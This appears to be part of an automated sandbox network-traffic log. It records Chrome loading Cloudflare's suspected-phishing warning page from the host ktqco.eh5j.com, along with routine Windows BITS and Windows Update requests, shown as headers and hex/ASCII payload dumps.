2024-10-01 22:19:10 UTC	1369	IN	Data Raw: 3a 23 36 32 61 31 64 38 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 31 36 33 39 35 39 3b 63 6f 6c 6f 72 3a 23 66 66 66 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 62 74 6e 2d 65 72 72 6f 72 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 62 74 6e 2d 69 6d 70 6f 72 74 61 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 62 64 32 34 32 36 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 63 6f 6c 6f 72 3a 23 66 66 66 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 3a 68 6f 76 65 72 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 62 74 6e 2d 65 72 72 6f 72 3a 68 6f 76 65 72 2c 23 Data Ascii: :#62a1d8;border:1px solid #163959;color:#fff}#cf-wrapper .cf-btn-danger,#cf-wrapper .cf-btn-error,#cf-wrapper .cf-btn-important{background-color:#bd2426;border-color:transparent;color:#fff}#cf-wrapper .cf-btn-danger:hover,#cf-wrapper .cf-btn-error:hover,#
2024-10-01 22:19:10 UTC	1369	IN	Data Raw: 61 63 65 3a 6e 6f 77 72 61 70 7d 23 63 66 2d 77 72 61 70 70 65 72 20 69 6e 70 75 74 2c 23 63 66 2d 77 72 61 70 70 65 72 20 73 65 6c 65 63 74 2c 23 63 66 2d 77 72 61 70 70 65 72 20 74 65 78 74 61 72 65 61 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 39 39 39 21 69 6d 70 6f 72 74 61 6e 74 3b 63 6f 6c 6f 72 3a 23 34 30 34 30 34 30 21 69 6d 70 6f 72 74 61 6e 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 36 36 36 37 65 6d 21 69 6d 70 6f 72 74 61 6e 74 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 34 21 69 6d 70 6f 72 74 61 6e 74 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 65 6d 21 69 6d 70 6f 72 74 61 6e 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 21 69 6d 70 6f 72 74 61 6e Data Ascii: ace:nowrap}#cf-wrapper input,#cf-wrapper select,#cf-wrapper textarea{background:#fff!important;border:1px solid #999!important;color:#404040!important;font-size:.86667em!important;line-height:1.24!important;margin:0 0 1em!important;max-width:100%!importan
2024-10-01 22:19:10 UTC	1369	IN	Data Raw: 3a 23 34 30 34 30 34 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 3a 37 2e 35 70 78 20 31 35 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 32 70 78 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 61 6c 65 72 74 3a 65 6d 70 74 79 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 61 6c 65 72 74 20 2e 63 66 2d 63 6c 6f 73 65 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 2e 37 35 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 3b 70 61 64 64 69 6e Data Ascii: :#404040;font-size:13px;padding:7.5px 15px;position:relative;vertical-align:middle;border-radius:2px}#cf-wrapper .cf-alert:empty{display:none}#cf-wrapper .cf-alert .cf-close{border:1px solid transparent;color:inherit;font-size:18.75px;line-height:1;paddin

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49747	172.67.183.69	443	1908	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-01 22:19:10 UTC	647	OUT	GET /cdn-cgi/images/icon-exclamation.png?1376755637 HTTP/1.1 Host: ktqco.eh5j.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ktqco.eh5j.com/cdn-cgi/styles/cf.errors.css Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-01 22:19:11 UTC	409	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 22:19:11 GMT Content-Type: image/png Content-Length: 452 Connection: close Last-Modified: Thu, 26 Sep 2024 09:13:11 GMT ETag: "66f525a7-1c4" Server: cloudflare CF-RAY: 8cbfd5322a4241e1-EWR X-Frame-Options: DENY X-Content-Type-Options: nosniff Expires: Wed, 02 Oct 2024 00:19:11 GMT Cache-Control: max-age=7200 Cache-Control: public Accept-Ranges: bytes
2024-10-01 22:19:11 UTC	452	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 36 00 00 00 36 08 03 00 00 00 bb 9b 9a ef 00 00 00 33 50 4c 54 45 c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f ab b2 22 ed 00 00 00 11 74 52 4e 53 00 40 30 10 60 8f bf ff ef 7f af 9f df 20 50 cf 70 60 82 c8 9b 00 00 01 2f 49 44 41 54 78 01 bd d3 05 d2 b4 30 10 06 e1 8e 6c de c1 36 dc ff b2 9f 2b 95 c9 12 7e 79 4a 91 46 22 b8 c2 8b c8 80 94 6f 45 1f ac 4c 81 33 f2 ac 03 5b 1e 95 69 32 b5 94 6e 98 57 79 4a c4 91 8a 7a 26 9a 82 a9 af a4 46 95 f5 d0 1a fb 95 c7 62 bf b2 f2 e9 70 7e e3 a7 a0 df ee 7c 3a 74 35 f1 6d b3 b3 99 66 70 af 69 f2 2f 65 ef c7 fa 99 25 de 25 1b c9 b4 f0 6e d2 50 a6 ed fb 65 Data Ascii: PNGIHDR663PLTEE?E?E?E?E?E?E?E?E?E?E?E?E?E?E?E?E?"tRNS@0` Pp`/IDATx0l6+~yJF"oEL3[i2nWyJz&Fbp~\|:t5mfpi/e%%nPe

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49749	172.67.183.69	443	1908	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-01 22:19:11 UTC	590	OUT	GET /favicon.ico HTTP/1.1 Host: ktqco.eh5j.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ktqco.eh5j.com/MlKbF/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-01 22:19:11 UTC	594	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 22:19:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fQ0yDxzxqxbq10eMLavmOa5851tTtTXfaDIZVZcncr%2B1HPH8wWetkKdxSAeFSIiBG4%2Bee7lPdKyAYpCw2hDyTlCB0eM90nN4tDjkSi07ctFwc9unC%2B0rF1u5ZQ9HY84%2F3A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Speculation-Rules: "/cdn-cgi/speculation" Server: cloudflare CF-RAY: 8cbfd536092c4386-EWR
2024-10-01 22:19:11 UTC	775	IN	Data Raw: 31 32 38 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 1283<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-10-01 22:19:11 UTC	1369	IN	Data Raw: 64 3d 27 63 66 5f 73 74 79 6c 65 73 2d 69 65 2d 63 73 73 27 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 Data Ascii: d='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { v
2024-10-01 22:19:11 UTC	1369	IN	Data Raw: 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 2f 63 64 6e 2d 63 67 69 2f 70 68 69 73 68 2d 62 79 70 61 73 73 22 20 6d 65 74 68 6f 64 3d 22 47 45 54 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 51 51 73 66 70 48 37 63 7a 4d 70 6c 33 75 43 76 63 53 43 4a 62 4f 30 4a 6e 42 36 77 4c 39 36 45 73 5a 4b 4e 35 49 6c 44 45 31 77 2d 31 37 32 37 38 32 31 31 35 31 2d 30 2e 30 2e 31 2e 31 2d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 64 61 74 61 Data Ascii: form action="/cdn-cgi/phish-bypass" method="GET"> <input type="hidden" name="atok" value="QQsfpH7czMpl3uCvcSCJbO0JnB6wL96EsZKN5IlDE1w-1727821151-0.0.1.1-/favicon.ico"> <button type="submit" class="cf-btn cf-btn-danger" data
2024-10-01 22:19:11 UTC	1234	IN	Data Raw: 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 68 69 64 64 65 6e 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 0a 20 20 20 20 20 20 59 6f 75 72 20 49 50 3a 0a 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 2d 62 74 6e 22 Data Ascii: rong></span> <span class="cf-footer-separator sm:hidden">•</span> <span id="cf-footer-item-ip" class="cf-footer-item hidden sm:block sm:mb-1"> Your IP: <button type="button" id="cf-footer-ip-reveal" class="cf-footer-ip-reveal-btn"
2024-10-01 22:19:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49752	172.67.183.69	443	1908	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-01 22:19:12 UTC	384	OUT	GET /cdn-cgi/images/icon-exclamation.png?1376755637 HTTP/1.1 Host: ktqco.eh5j.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-01 22:19:12 UTC	409	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 22:19:12 GMT Content-Type: image/png Content-Length: 452 Connection: close Last-Modified: Thu, 26 Sep 2024 09:13:11 GMT ETag: "66f525a7-1c4" Server: cloudflare CF-RAY: 8cbfd5396e14c346-EWR X-Frame-Options: DENY X-Content-Type-Options: nosniff Expires: Wed, 02 Oct 2024 00:19:12 GMT Cache-Control: max-age=7200 Cache-Control: public Accept-Ranges: bytes
2024-10-01 22:19:12 UTC	452	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 36 00 00 00 36 08 03 00 00 00 bb 9b 9a ef 00 00 00 33 50 4c 54 45 c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f ab b2 22 ed 00 00 00 11 74 52 4e 53 00 40 30 10 60 8f bf ff ef 7f af 9f df 20 50 cf 70 60 82 c8 9b 00 00 01 2f 49 44 41 54 78 01 bd d3 05 d2 b4 30 10 06 e1 8e 6c de c1 36 dc ff b2 9f 2b 95 c9 12 7e 79 4a 91 46 22 b8 c2 8b c8 80 94 6f 45 1f ac 4c 81 33 f2 ac 03 5b 1e 95 69 32 b5 94 6e 98 57 79 4a c4 91 8a 7a 26 9a 82 a9 af a4 46 95 f5 d0 1a fb 95 c7 62 bf b2 f2 e9 70 7e e3 a7 a0 df ee 7c 3a 74 35 f1 6d b3 b3 99 66 70 af 69 f2 2f 65 ef c7 fa 99 25 de 25 1b c9 b4 f0 6e d2 50 a6 ed fb 65 Data Ascii: PNGIHDR663PLTEE?E?E?E?E?E?E?E?E?E?E?E?E?E?E?E?E?"tRNS@0` Pp`/IDATx0l6+~yJF"oEL3[i2nWyJz&Fbp~\|:t5mfpi/e%%nPe

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49751	184.28.90.27	443

Timestamp	Bytes transferred	Direction	Data
2024-10-01 22:19:12 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-10-01 22:19:12 UTC	467	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF06) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-neu-z1 Cache-Control: public, max-age=152798 Date: Tue, 01 Oct 2024 22:19:12 GMT Connection: close X-CID: 2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49754	172.67.183.69	443	1908	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-01 22:19:12 UTC	349	OUT	GET /favicon.ico HTTP/1.1 Host: ktqco.eh5j.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-01 22:19:12 UTC	590	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 22:19:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lJYZBgjO10vwKBSnv0yZl2FIcdufQLptah68I32wWfJefaNN8Vh%2BGsikXsz6zNEc9z0e53wgBhNIp2Xien8cQ7jzDYyhoFDGOnKrO0fD5DekHdBzvtM%2FsXvQTiUxXSVLMw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Speculation-Rules: "/cdn-cgi/speculation" Server: cloudflare CF-RAY: 8cbfd53d0b2018ee-EWR
2024-10-01 22:19:12 UTC	779	IN	Data Raw: 31 32 38 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 1283<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-10-01 22:19:12 UTC	1369	IN	Data Raw: 66 5f 73 74 79 6c 65 73 2d 69 65 2d 63 73 73 27 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 Data Ascii: f_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var c
2024-10-01 22:19:12 UTC	1369	IN	Data Raw: 20 61 63 74 69 6f 6e 3d 22 2f 63 64 6e 2d 63 67 69 2f 70 68 69 73 68 2d 62 79 70 61 73 73 22 20 6d 65 74 68 6f 64 3d 22 47 45 54 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 73 46 49 63 51 6a 69 79 37 51 6e 70 42 33 37 34 6a 39 7a 70 51 79 33 34 4d 51 6e 69 35 51 72 61 37 7a 70 4e 6e 76 42 6c 39 38 59 2d 31 37 32 37 38 32 31 31 35 32 2d 30 2e 30 2e 31 2e 31 2d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 64 61 74 61 2d 74 72 61 Data Ascii: action="/cdn-cgi/phish-bypass" method="GET"> <input type="hidden" name="atok" value="sFIcQjiy7QnpB374j9zpQy34MQni5Qra7zpNnvBl98Y-1727821152-0.0.1.1-/favicon.ico"> <button type="submit" class="cf-btn cf-btn-danger" data-tra
2024-10-01 22:19:12 UTC	1230	IN	Data Raw: 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 68 69 64 64 65 6e 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 0a 20 20 20 20 20 20 59 6f 75 72 20 49 50 3a 0a 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 2d 62 74 6e 22 3e 43 6c 69 Data Ascii: ></span> <span class="cf-footer-separator sm:hidden">•</span> <span id="cf-footer-item-ip" class="cf-footer-item hidden sm:block sm:mb-1"> Your IP: <button type="button" id="cf-footer-ip-reveal" class="cf-footer-ip-reveal-btn">Cli
2024-10-01 22:19:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49755	184.28.90.27	443

Timestamp	Bytes transferred	Direction	Data
2024-10-01 22:19:13 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-10-01 22:19:13 UTC	515	IN	HTTP/1.1 200 OK ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF06) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-weu-z1 Cache-Control: public, max-age=152741 Date: Tue, 01 Oct 2024 22:19:13 GMT Content-Length: 55 Connection: close X-CID: 2
2024-10-01 22:19:13 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49759	20.114.59.183	443

Timestamp	Bytes transferred	Direction	Data
2024-10-01 22:19:22 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=bgEgzuWRKtWggtf&MD=VvOF+Lpr HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-10-01 22:19:22 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: c8141eda-8dbd-428a-8606-cb827804ba17 MS-RequestId: 5dce446b-1d7d-4034-bb76-88c38d60ac5a MS-CV: E1AXY3ovLE2EC3F7.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Tue, 01 Oct 2024 22:19:22 GMT Connection: close Content-Length: 24490
